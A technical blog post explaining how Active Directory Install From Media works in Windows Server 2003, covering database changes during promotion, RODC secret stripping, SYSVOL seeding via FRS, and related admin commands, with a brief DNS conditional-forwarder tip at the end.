Preventing a Read-Only Domain Controller (RODC) promotion using non-converted IFM media from a full DC: This is prevented by looking at the instanceType on the domain NC head. If it contains the WRITE flag and a promotion of an RODC is in progress, the promotion fails with: The Install-From-Media promotion of a Read-Only DC cannot start because the specified source database is not allowed. Only databases from other RODCs can be used for IFM promotion of a RODC. (8200)
Preventing a full/writable Domain Controller (DC) promotion using RODC IFM media: This is prevented by looking at the instanceType on the domain NC head. If it doesn't contain the WRITE flag and a promotion of a full/writable DC is in progress, the promotion fails with an error similar to the one above.
If the schema version in the IFM media database differs from the local machine's schema.ini, the builds of the source and the current operating system are considered a mismatch and the promotion will fail.
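The two instanceType checks boil down to one rule. A minimal sketch, assuming only that 0x4 is the WRITE flag on the domain NC head (the function name and boolean model are mine):

```python
# Sketch of the DCPROMO instanceType checks described above.
IT_WRITE = 0x4  # WRITE flag on an NC head's instanceType

def ifm_media_allowed(domain_nc_instance_type: int, promoting_rodc: bool) -> bool:
    media_is_writable = bool(domain_nc_instance_type & IT_WRITE)
    if promoting_rodc and media_is_writable:
        # error 8200: only RODC-sourced media may promote an RODC
        return False
    if not promoting_rodc and not media_is_writable:
        # a full/writable DC cannot be promoted from RODC media
        return False
    return True
```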
Preventing secrets from sneaking into a Read-Only Domain Controller (RODC) being promoted using IFM
The NTDSUTIL tool makes sure that IFM media produced for Read-Only Domain Controllers (RODCs) is completely stripped of secret attributes, hidden attributes, and attributes carrying the "Filtered Attribute Set" flag. In fact, the columns representing those attributes in NTDS.dit and the ‘datatable’ are completely removed, and any linked attributes carrying the "Filtered Attribute Set" flag have their rows deleted from the ‘link_table’.
Note: These are all physically deleted and don't end up in the Deleted Objects container in either the IsDeleted or IsRecycled state.
DCPROMO performs an additional check and ensures that no secrets are present in NTDS.dit while an RODC is being promoted from IFM; if there are columns in the database representing any secrets (as mentioned above), those will be deleted.
As a final safeguard, in case any secrets are left in the DB, the last USN allocated to the database before it was IFM'ed is stored, as in every database, in the ‘usn_col’ column of the ‘hiddentable’.
(Once the DB is fully initialized and accepts updates again, new USNs are allocated and this is reflected in ‘usn_col’.) However, before the Directory System Agent (DSA) accepts updates again, the value in ‘usn_col’ is copied over to a new column named ‘usnatrifm’. This column maintains the USN from before the promotion of the DC using the IFM media, and it remains the same as it was when the IFM media was produced for the entire lifetime of the database (until the DC is demoted).
This allows secret replication to compare ‘usnatrifm’ with the local metadata of the attribute containing the secret: if that USN is not higher than the ‘usnatrifm’ column, the current secret in the database came in with the IFM media, is considered not cached (not valid), and will be replicated in again, overwriting the old secret that made it in with the IFM.
The reason why ‘usnatrifm’ has to remain for the entire lifetime of the DC is that secret caching happens on demand: a secret may have made it in with the IFM for user account ‘ChristofferA’, and ‘ChristofferA’ may move into the branch where the RODC is placed and authenticate five years after it was promoted.
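The watermark comparison can be sketched as a one-line predicate. This is a simplified model of the described behavior (real replication metadata is per-attribute and richer than a single integer):

```python
# Sketch of the 'usnatrifm' secret-caching decision: a secret is trusted as
# genuinely cached only if its local metadata USN is newer than the watermark
# recorded when the DC was promoted from IFM media.
def secret_is_cached(secret_meta_usn: int, usn_at_ifm: int) -> bool:
    # Newer than the watermark => written after promotion (on-demand caching).
    # Otherwise it rode in with the media and must be replicated in fresh.
    return secret_meta_usn > usn_at_ifm
```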
This is the first blog post in a series covering how the "Install from media" feature really works. It's an in-depth, very technical post that explains what happens under the hood, and this first part focuses on how it works in Windows Server 2003.
Background
Install from media was first introduced in Windows Server 2003 as a solution to improve the installation experience of newly promoted domain controllers, mainly in branch offices (or sites with slow links where the initial replication could take significant time to complete). It is also an important component in many disaster recovery plans I have designed for various customers over the years, as it is a fast and efficient way to re-install a domain controller and get it back in sync (the proper way to handle a faulting replica/domain controller in most cases). There are some common misunderstandings of the concept "Install from media" in terms of whether the operation can be performed entirely offline or online. The short answer is: No, it can't be performed offline; you have to be online with at least one writable domain controller in the same domain as the IFM source was taken from, and even then you may not be fully efficient and may cause replication to happen over the network anyway. This needs some further explanation.
What does Install from media (IFM) consist of
Install from media (IFM) contains three important things.
NTDS.DIT (Active Directory database) – as of the time the IFM is generated. (Regardless of Windows Server 2003, Windows Server 2008 or later, the NTDS.dit is pretty much unchanged until DCPROMO makes a lot of changes on the becoming domain controller that makes use of the database – it will change the DSA reference and update related "instance specific" information in the hidden table.)
SYSVOL (SYSVOL GPT Storage)
Registry (contains the SYSKEY used to decrypt the PEK, also known as the Password Encryption Key, which ensures that the protection of sensitive information stored in the Active Directory database, such as password hashes, is unique to each instance of the database – read: each domain controller). Note: This doesn't apply to RODCs.
Sourcing install from media (IFM) using System State and VSS
Sourcing the media used by IFM differs between Windows Server 2003 (all versions) and Windows Server 2008 and later; the difference is the technology used to gather the required information.
Windows Server 2003 IFM media is generated by performing a system state backup. The reason for this is that we can get a copy of ntds.dit while we're up and running (DsIsNTDSOnline=True, i.e. Active Directory is operational); this is achieved via the DsBackup API: http://msdn.microsoft.com/en-us/library/ms675896(VS.85).aspx. We will also get a copy of SYSVOL, since a system state backup contains the following:
Active Directory
The SYSVOL tree
The Boot.ini file
The COM+ class registration database
The registry
To be more specific the following is required in the system state in order to be able to source IFM:
Active Directory is required.
The SYSVOL tree may be optionally removed. (A specific configuration is required to source the SYSVOL tree during IFM promotion)
The Boot.ini file may be removed.
The COM+ class registration database may be removed.
The registry folder is required. Registry components are required as follows:
The Default file in the Registry folder may be removed.
The SAM file is required.
The SECURITY folder is required.
The SOFTWARE file may be removed.
The SYSTEM file is required.
We are responsible for restoring the system state backup ourselves to an alternative location and ensuring we gather the required information above. (Optionally, if we care about disk size optimization, we can select only the specific components required in the system state backup, and we can also perform an offline defragmentation of the ntds.dit database.)
We can only use IFM to promote domain controllers in the same domain as we sourced it from, and the target domain controller has to be running the same operating system, including service pack and architecture (x86/x64).
Sourcing the NTDS.DIT – Active Directory database from IFM in Windows Server 2003
As explained earlier in this article, the Active Directory database (NTDS.dit) is backed up either by the DsBackup API or the VSS API. The Active Directory database is unique to each DC and contains the NCs hosted by the DC – typically Domain, Schema, and Configuration, and in some cases NDNCs (also known as application partitions), such as DomainDNSZones and ForestDNSZones. If the DC is also a GC, it will contain partial information about every object in all domain NCs in the entire forest (in a multi-domain forest) – though if a DC is a GC in a single-domain environment, the domain NC is only stored once in the database. If the sourced database came from a GC, the computer being promoted to a DC using that source will also become a GC.
During the backup itself (even if the intent is IFM), no changes are made to the database except setting the backup expiration date and backup USN in the hidden record (also known as the hidden table). Changes are instead made during DCPROMO on the computer that is about to become a DC using the sourced database from the IFM.
Before we can have an in-depth look at the changes that take place inside the Active Directory database during IFM, we need to understand the physical layout of the database and some key concepts. (Note: For the purposes of this article, the NTDS.dit physical layout is simplified rather than the real/exact layout, for display purposes.)
The Active Directory database (NTDS.DIT) contains the following tables.
datatable
Contains: Domain, Schema, Config and NDNCs, as well as partial NCs – basically every object and phantom.
hiddentable
Contains the DSA identity and various related information
linktable
N/A – Out of scope for this article
quota_rebuild_progress_table
N/A – Out of scope for this article
quota_table
N/A – Out of scope for this article
sdproptable
N/A – Out of scope for this article
sd_table
N/A – Out of scope for this article
Ensure the database isn't outdated, i.e. older than the Tombstone Lifetime (TSL)
During DCPROMO, the sourced IFM database is verified not to have passed the Tombstone Lifetime (TSL) of the forest; if the database is older than the TSL, the promotion is aborted. More specifically, this is measured against the object with the last USN change and its whenChanged date.
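The freshness check can be sketched like this. It is a minimal model: the 60-day default and the single-timestamp comparison are simplifications (the real default TSL varies by forest, e.g. 60 or 180 days).

```python
# Sketch of the tombstone-lifetime check DCPROMO performs on sourced media.
from datetime import datetime, timedelta

def ifm_database_usable(last_change: datetime, now: datetime,
                        tombstone_lifetime_days: int = 60) -> bool:
    """Abort the promotion if the media is older than the forest TSL."""
    return now - last_change <= timedelta(days=tombstone_lifetime_days)
```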
Change/Adjust the DSA – Directory Service Agent Identity
The "hiddentable", also known as the hidden record, contains the identity of the local DSA – Directory Services Agent (DC) – hosting the instance of the database. This identity points to the DC's NTDSA object within the directory stored in the "datatable"; the NTDSA object in its turn contains necessary information such as the DMD, to be able to read the schema and so on. (I will write another article on how this works in more detail.) When it comes to IFM, the DSA identity stored in the hidden record/hidden table still points to the identity of the DC the IFM was sourced from, and this causes an issue. The following illustrates the relationship between the DSA identity in the "hiddentable" and the NTDS Settings object stored in the "datatable" – that's actually the NTDS Settings object you will see under the server object in Active Directory Sites and Services.
Table 2: NTDS.DIT "datatable" (Simplified Version)
So in this example, NTTEST-SCH-01 is the DC where we sourced the IFM (backed up the database). Now, how do we get the new identity of the computer being promoted to a DC using the sourced IFM media? Well, the new DSA for the computer being promoted is actually created remotely during DCPROMO on another DC (the DC we perform the initial replication with, specified in the unattended answer file by the "ReplicationSourceDC" parameter). Before we can change the record in the "hiddentable" to point to it, we must replicate in the newly created DSA by replicating the Configuration NC – and this can cause an issue by itself: if we're performing the initial replication with the DC we sourced the IFM from, we're temporarily presenting ourselves as that very same DC, and replication will fail.
So how is this solved? We create a temporary "dummy" DSA with a corresponding server object in the database, retire invocation IDs, and copy all references to NCs hosted by the old DSA (not doing so would cause the KCC to trigger a deletion of those sourced NCs later on); the temporary "dummy" DSA is created in the first site identified in alphabetical order.
Now we can re-initialize and successfully replicate in the remotely created DSA by replicating the Configuration NC using the temporary "dummy" DSA identity, retire invocation IDs, and copy all references to NCs hosted by the temporary "dummy" DSA (again, not doing so would cause the KCC to trigger a deletion of those sourced NCs later on). We can now remove the temporary "dummy" DSA and store the real identity of the computer being promoted in the "hiddentable".
We can now re-initialize as ourselves with our real DSA identity and continue processing.
Remove non-replicated attributes from the database.
Non-replicated attributes (containing bit 0x00000001 in System-Flags), such as badPwdCount, Last-Logon, and Last-Logoff, are stored on each domain controller but are not replicated. The non-replicated attributes pertain to a particular domain controller; as they contain local information associated with the DC the IFM was sourced from, they are deleted (with a few exceptions).
Decrypt and Re-encrypt the Password Encryption Key (PEK)
Secret data stored within the Active Directory database (NTDS.DIT), such as password hashes, is additionally protected by a Password Encryption Key (PEK). The PEK is encrypted with the SYSKEY of the DC and is therefore unique to each DC; the sourced NTDS.dit from the IFM contains a PEK encrypted with the SYSKEY of the DC on which the IFM was generated (the computer where the NTDS.dit was backed up). DCPROMO will decrypt the PEK using the SYSKEY of the DC the IFM was sourced from, taken from the registry in the restored IFM data, since the SYSKEY is stored in the registry (that's one reason why we need to include parts of the registry in IFM), and then re-encrypt the PEK with the SYSKEY of the computer being promoted to a DC.
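The key flow can be illustrated with a toy sketch. To be clear: real DCs use SYSKEY-derived ciphers (RC4/AES), not XOR; the throwaway XOR "cipher" below stands in only so the decrypt-then-re-encrypt flow is visible, and all key material here is invented.

```python
# Toy illustration of the PEK re-wrap during an IFM promotion.
# XOR is NOT the real cipher; it just makes the key flow visible.
def xor_crypt(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def rewrap_pek(encrypted_pek: bytes, old_syskey: bytes, new_syskey: bytes) -> bytes:
    pek = xor_crypt(encrypted_pek, old_syskey)   # decrypt with the source DC's SYSKEY
    return xor_crypt(pek, new_syskey)            # re-encrypt with the new DC's SYSKEY

pek = b"master-key"                              # hypothetical PEK
wrapped = xor_crypt(pek, b"old-syskey")          # as found in the IFM media
rewrapped = rewrap_pek(wrapped, b"old-syskey", b"new-syskey")
```

The plaintext PEK never changes; only the SYSKEY wrapping it does, which is why each DC's database is uniquely protected.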
Diagnostics and Logging
IFM promotions can be identified in the Dcpromo.log and Dcpromoui.log files located in the %systemroot%\debug folder. There are several entries that can be used to verify that the database was sourced from the IFM media and that the promotion did use IFM.
Table 3: DCPROMO.log
DCPROMO.log
07/03 06:35:29 [INFO] Copying restored Active Directory files from C:\IFM_MEDIA\Active Directory\ntds.dit to C:\WINDOWS\ntds\ntds.dit…
07/03 06:35:29 [INFO] Copying restored Active Directory files from C:\IFM_MEDIA\Active Directory\edb00001.log to C:\WINDOWS\ntds\edb00001.log…
07/03 06:35:29 [INFO] Active Directory is initializing the restored database files. This might take several minutes.
Table 4: DCPROMOUI.log
DCPROMOUI.log
dcpromoui AAC.AB0 0271 Enter State::ReplicateFromMedia true
dcpromoui AAC.AB0 0272 Enter State::GetReplicationSourcePath C:\IFM_MEDIA
Sourcing NDNCs with Windows Server 2003 is only supported on Windows Server 2003 SP1 or later, under the following conditions:
Both the DC you're sourcing the IFM from and the machine intended to become a DC using the sourced IFM must be running Windows Server 2003 SP1 or later.
The forest functional level (FFL) has to be Windows Server 2003 (pre-Windows Server 2003 FFL, adding replicas to NCs has to be done on the Domain Naming Master FSMO).
Note: The promotion completes with the sourced IFM even if the forest functional level (FFL) is below Windows Server 2003, but NDNCs aren't sourced from the IFM and the following will happen:
The following will be logged in the Directory Services Log: “The forest functional level is not high enough to complete addition of application directory partitions during installation of the directory. Therefore specified application directory partitions will not be added to this domain controller during installation. If you would like to make this server a replica of an application directory partition, you could re-add these application partition after the installation is complete.”
The following will be logged in the Directory Services Log, and the DC will begin the process of physically removing the NDNCs sourced from the IFM from the DC's database: "The local domain controller is no longer configured to host the following directory partition. As a result, the objects in this directory partition will be removed from the local Active Directory database." Note: In this case the DomainDNSZones and ForestDNSZones NDNCs.
The DomainDNSZones and ForestDNSZones are then replicated in again over the wire using normal replication, as the promoted DC (sourced from IFM) hosts the DNS service. As a result, the DC has to obtain a new invocationID once again (it has already done this once in order to use the sourced IFM database instance). Note: This can be confirmed by running the repadmin /showsig command.
Default-First-Site-Name\NTTEST-SCH-02
Current DC invocationID: 7bbd4543-cf19-44e3-9638-96907ceb8a36 <- current invocationID, obtained because of removing/adding NDNCs
28081325-eee8-40b0-9587-9c02867040bc retired on 2011-07-03 07:16:41 at USN 32780 <- new invocationID representing the sourced IFM, restored/promoted as a new instance on the current DC
b7633426-242b-47bf-852c-a07466ef937f retired on 2011-07-03 06:35:39 at USN 16397 <- invocationID representing the instance on the DC where the IFM was sourced
You have to use an unattended answer file specifying the ReplicateFromMedia=Yes parameter as well as the ApplicationPartitionsToReplicate parameter. Note that this can be used to include specific NDNCs, or you can simply include them all by specifying a wildcard. Here are some samples:
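A minimal [DCInstall] sample along these lines might look as follows. The domain and server names are hypothetical placeholders; ReplicateFromMedia, ReplicationSourceDC, and ApplicationPartitionsToReplicate are the parameters named in the text, and ReplicationSourcePath points at the restored IFM media.

```ini
[DCInstall]
ReplicaOrNewDomain=Replica
ReplicaDomainDNSName=contoso.com
ReplicationSourceDC=DC01.contoso.com
ReplicateFromMedia=Yes
ReplicationSourcePath=C:\IFM_MEDIA
; replicate every NDNC found on the media:
ApplicationPartitionsToReplicate=*
; ...or list specific NDNCs instead:
; ApplicationPartitionsToReplicate="DC=DomainDnsZones,DC=contoso,DC=com" "DC=ForestDnsZones,DC=contoso,DC=com"
```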
The File Replication Service (FRS) can source files and folders from the restored system state backup on the first restart after a DCPROMO IFM promotion, provided the strict dependencies that FRS requires are fulfilled.
The system state backup must contain MD5 checksum data that is used by the File Replication Service (FRS) to determine if a restored file or folder is the same as the file versions on existing domain controllers in the domain.
The File Replication Service (FRS) must have constructed MD5 checksum data for the files in the SYSVOL tree.
For MD5 checksums to exist, files and folders in the SYSVOL tree must have been replicated at least once after there were two or more domain controllers in the domain. (Note: The SYSVOL can never be efficiently sourced from IFM media, also known as a system state backup in Windows Server 2003, unless there are at least two DCs already present in the domain at the point when the IFM media is generated.) You can trigger FRS to store the MD5 checksums of all files in the SYSVOL tree by writing a script that modifies the files, for example setting/un-setting the hidden attribute; that will simply trigger a replication.
Furthermore, the MD5 checksum data is stored in the ntfrs.jdb ESE database, by default located in "%SystemRoot%\ntfrs\jet". The ntfrs.jdb ESE database uses 4k pages and has the following layout.
Table 5: NTFRS.JDB Database Layout
The MD5 checksums are stored in the IDTable0000X tables, in the Spare1Bin column.
You can validate the existence of MD5 checksums by running "ntfrsutil idtable > MD5Hash.txt" and searching for entries missing hashes.
Table 6: NTFRS.JDB IDTable
IDTable
Table Type: ID Table for DOMAIN SYSTEM VOLUME (SYSVOL SHARE) (1) FileGuid : 790adf00-7709-447d-9a756b655931151b
The SYSVOL part of the IFM media (also known as the system state backup) must be restored to the same volume that is chosen to host the SYSVOL tree when you run DCPROMO, or the location has to be set to the same value in your unattended answer file.
Seeding the SYSVOL with IFM on Windows Server 2003:
Even if the SYSVOL is sourced with IFM, delta changes are still replicated in over the network. There are certain requirements to ensure that this process is efficient and that the entire SYSVOL tree is not replicated over the network again. One of the requirements has already been discussed in this article regarding MD5 checksums: The File Replication Service (FRS) must have constructed MD5 checksum data for the files in the SYSVOL tree.
The Domain Controller (DC) or File Replication Service replica (FRS replica) that the initial replication of the SYSVOL tree takes place with must meet the following requirements.
The DC or FRS replica that the initial replication takes place with is identified by specifying the "ReplicationSourceDC" parameter in the unattended dcpromo answer file. (Note: this can't be done using the UI.)
How to best select the Domain Controller (DC) or File Replication Service Replica (FRS Replica) to perform initial replication with:
Locate a domain controller that has a low number of inbound and outbound connections. This domain controller must not be a significant originator or forwarder of change orders to downstream partners in SYSVOL or FRS-replicated DFS replica sets.
Locate a domain controller that doesn't act as a bridgehead server (those typically have many replication partners).
The FRS outbound log on the DC/FRS replica used to seed the SYSVOL tree must be cleared so that a full vvjoin is triggered when the initial synchronization of SYSVOL with the IFM-promoted DC occurs. The reason is that if the outbound log contains cached items, an optimized vvjoin is performed, and optimized vvjoins don't support pre-staged content; this results in a full replication of the entire SYSVOL tree over the network to the IFM-promoted DC instead of only delta changes and new files.
How to verify and clear the outlog:
On the intended helper DC (the DC chosen to perform initial replication with), run ntfrsutil outlog to show current entries in the outlog change cache.
Note: See Table 5: NTFRS.JDB Database Layout for the outlog table layout earlier in this article
If ntfrsutil outlog shows entries, the outlog needs to be trimmed/reset, unless the period of time specified as the "Outlog Change History In Minutes" (by default 7 days) has already passed since the IFM media was generated.
Change the Outlog Change History In Minutes value in the following registry subkey to 0 (zero): HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NtFrs\Parameters
Run ntfrsutl poll /now
Restart the FRS service on the actual DC/FRS replica: net stop ntfrs && net start ntfrs
Run ntfrsutil outlog again; the contents of the current outbound log must contain only files that have been modified after you changed the registry and restarted FRS.
Note: Don't forget to reset the Outlog Change History In Minutes registry value back to the seven-day default once you're done with the IFM operations (i.e. all DCs intended to be promoted with IFM have been promoted).
Configure Debug and Analysis logging on the computer that is to be promoted using IFM
Configure Debug Severity on the computer that is about to be promoted using IFM media:
To be able to determine whether files in the SYSVOL tree are being moved in from the pre-staged folder on the local computer or replicated over the network from an upstream partner, set the Debug Log Severity registry value to 4 on the computer being promoted using IFM media, in the following registry subkey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NtFrs\Parameters. Note: This has to be configured before you promote the computer to a DC using IFM.
Verify whether the files in the SYSVOL tree were seeded from the pre-stage folder (the restored IFM media) or replicated over the network.
To find all the files that were replicated from the initial replication partner over the wire (files that weren't seeded from IFM), type:
findstr /I "RcsReceivingStageFile" NtFrs_000X.log, where X is the number of the log; in the case of multiple logs, e.g. NtFrs_0001.log, NtFrs_0002.log etc., run the command against all files.
To find all files that were sourced from the pre-staged system state backup, type:
findstr /I "(218)" NtFrs_000X.log, where X is the number of the log; in the case of multiple logs, e.g. NtFrs_0001.log, NtFrs_0002.log, run the command against all files.
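If you prefer scripting the analysis, the two findstr searches above can be combined into one pass over the logs. A sketch, assuming only the two markers named in the text (the sample log lines themselves are invented for illustration):

```python
# Classify NtFrs_000X.log entries: replicated over the wire vs. seeded from
# the pre-staged IFM media. The sample lines below are hypothetical.
def classify_frs_log(lines):
    over_wire, pre_staged = [], []
    for line in lines:
        if "rcsreceivingstagefile" in line.lower():  # staged in from a partner
            over_wire.append(line)
        elif "(218)" in line:                        # marker for pre-staged files
            pre_staged.append(line)
    return over_wire, pre_staged

sample = [
    "RcsReceivingStageFile: policy1.pol",       # hypothetical log line
    "(218) installed from pre-existing file",   # hypothetical log line
]
wire, staged = classify_frs_log(sample)
```

To run it against real logs, read each NtFrs_000X.log with `open(...).read().splitlines()` and pass the lines in.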
For those of you that couldn't attend Microsoft TechDays 2011 in Sweden on site: I did a session on upgrading a Windows Server 2003 Active Directory environment to Windows Server 2008 R2 with a focus on automated processes. The scripts used in this session (also available for download at this blog) were developed by the Enfo Zipper – Directory Services Team and used in a real-world scenario to upgrade an enterprise customer's forest.
This is easy in Windows Server 2008 R2 and later: when you create a new conditional forwarder in the DNS Manager, simply select "Store this conditional forwarder in Active Directory, and replicate it as follows:"
All DNS Servers in this forest
All DNS Servers in this domain
All Domain controllers in this domain (for Windows 2000 compatibility)
If you want to store a conditional forwarder in the DS with, say, the replication scope set to "All DNS servers in this forest", you can still do so, but not in the DNS Manager UI; you have to use the dnscmd command-line tool as follows:
Run the following command to create a directory-integrated conditional forwarder: dnscmd %computername% /zoneadd <ForestRootDomain> /dsforwarder IPtoNS1 IPtoNS2 /DP /forest
Note: If the above command fails, it's most likely because the forwarding zone already exists, either as a file-based forwarding zone on one of the DCs in the forest, or already as a DS-based forwarding zone. (Note: a DS-based forwarder can already exist in the domain scope in any domain in the forest; if that's the case, either use /ZoneResetType /DP /forest or delete and re-create the forwarder.)